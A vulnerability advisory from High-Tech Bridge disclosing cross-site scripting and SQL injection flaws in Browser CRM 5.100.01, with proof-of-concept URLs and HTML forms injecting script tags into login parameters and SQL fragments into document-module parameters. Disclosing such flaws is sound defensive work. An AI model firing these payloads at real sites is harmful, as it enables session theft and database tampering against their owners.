Total Tests:

Multiple vulnerabilities in Browser CRM

Advisory ID:HTB23059
Product:Browser CRM
Vendor:BrowserCRM Limited
Vulnerable Versions:5.100.01 and probably prior
Tested Version:5.100.01
Advisory Publication:November 23, 2011 [without technical details]
Vendor Notification:November 23, 2011
Public Disclosure:December 14, 2011
Vulnerability Type:Cross-Site Scripting [CWE-79]
SQL Injection [CWE-89]
Risk Level:High
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Browser CRM, which can be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-Site Scripting in Browser CRM
1.1 Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site
The following PoC code is available:
http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E
http://[host]/modules/calendar/customise_calendar_times.php/%22%3E%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")
1.2 Input passed via the "login[]" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/index.php" method="post">
<input type="hidden" name="login[host]" value='"><script>alert(1);</script>'>
<input type="hidden" name="login[password]" value='"><script>alert(2);</script>'>
<input type="hidden" name="login[rebuild_cache]" value='"><script>alert(3);</script>'>
<input type="hidden" name="login[remember_me]" value='"><script>alert(4);</script>'>
<input type="hidden" name="login[skin]" value='"><script>alert(5);</script>'>
<input type="hidden" name="login[username]" value='"><script>alert(6);</script>'>
<input type="submit" value="submit" id="btn">
</form>

1.3 Input passed via the "framed" GET parameter to /licence/index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/licence/index.php?framed=%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
1.4 Input passed via the "framed" GET parameter to /licence/view.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/licence/view.php?framed=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
1.5 Input passed via the "login[]" POST parameters to /pub/clients.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/pub/clients.php" method="post">
<input type="hidden" name="login[host]" value='"><script>alert(1);</script>'>
<input type="hidden" name="login[username]" value='"><script>alert(2);</script>'>
<input type="hidden" name="login[password]" value='"><script>alert(3);</script>'>
<input type="hidden" name="login[webform]" value='"><script>alert(4);</script>'>
<input type="hidden" name="login[disable_email_check]" value='"><script>alert(5);</script>'>
<input type="hidden" name="login[client_email]" value='"><script>alert(6);</script>'>
<input type="hidden" name="login[client_password]" value='"><script>alert(7);</script>'>
<input type="submit" value="submit" id="btn">
</form>


2) SQL Injection in Browser CRM
2.1 Input passed via the "login[username]" POST parameter to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
<form action="http://[host]/index.php" method="post">
<input type="hidden" name="login[username]" value='1" SQL_CODE_HERE'>
<input type="submit" value="submit" id="btn">
</form>

2.2 Input passed via the "parent_id" GET parameter to /modules/Documents/version_list.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/modules/Documents/version_list.php?parent_id=1%20AND%201=2%20- -%202
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
2.3 Input passed via the "contact_id" GET parameter to /modules/Documents/version_list.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/modules/Documents/index.php?id=1&contact_id=1%27%20OR%20%271%2 7=%271
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB23059 - https://www.immuniweb.com/advisory/HTB23059 - Multiple vulnerabilities in Browser CRM
[2] BrowserCRM - browsercrm.com - BrowserCRM - web based customer management for business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential